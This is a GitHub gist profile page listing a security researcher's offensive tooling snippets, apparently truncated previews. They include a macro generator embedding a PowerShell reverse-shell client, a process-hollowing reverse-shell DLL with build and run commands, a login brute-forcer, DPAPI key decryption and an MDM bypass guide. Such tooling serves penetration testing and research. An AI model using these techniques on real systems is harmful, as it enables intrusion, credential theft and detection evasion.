Skip to content

Instantly share code, notes, and snippets.


Frank Spierings FrankSpierings

View GitHub Profile
FrankSpierings /
Created Apr 30, 2021
Generate a XLSM macro from python
import codecs
import base64
data = '''$lhost="";
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
FrankSpierings / pshost.cs
Created Apr 29, 2021
PowerShell Host example. Obtaining its commands from a remote location.
View pshost.cs
// c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe pshost.cs /r:c:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using PowerShell = System.Management.Automation.PowerShell;
internal class InfantAnnihilator
private static void Main(string[] args)
FrankSpierings /
Last active Apr 25, 2021
Decrypt Protect file using PVK Domain key
# Referenced sources:
# - Mimikatz
# -
# -
from io import BytesIO
import struct
import math
import codecs
from Crypto.PublicKey import RSA
FrankSpierings /
Created Mar 16, 2021
Brutus - Brute-force login on a Xelion system using their own classes.
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7
- Notice the target & source. Otherwise CORBA can't be found.
- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
FrankSpierings /
Created Feb 25, 2021
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
import xml.dom.minidom as minidom
# Constants
class SAMLRaider():
def __init__(self, match_replace_map: dict = None):
"""SAMLRainder object
FrankSpierings / README.MD
Last active Apr 7, 2021
Apple Device Enrollment Program (DEP) - ByPass MDM Policy using Checkra1n exploit


  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpline.

Wipe iPad and restore Firmware

FrankSpierings / process-hollow-shell-dll.c
Last active Nov 26, 2020
Reverse shell which uses process hollowing technique
View process-hollow-shell-dll.c
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
// Run:
// rundll32 process-hollow-shell.dll,main 4444
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
FrankSpierings /
Last active Feb 9, 2021
Burp extension to minify a requests headers and parameters to another repeater tab.
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
FrankSpierings /
Last active Nov 10, 2020
Burp NTFS Alternative Data Stream Scanner
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
FrankSpierings /
Created Oct 6, 2020
Checks OneDrive access based on someone's UPN.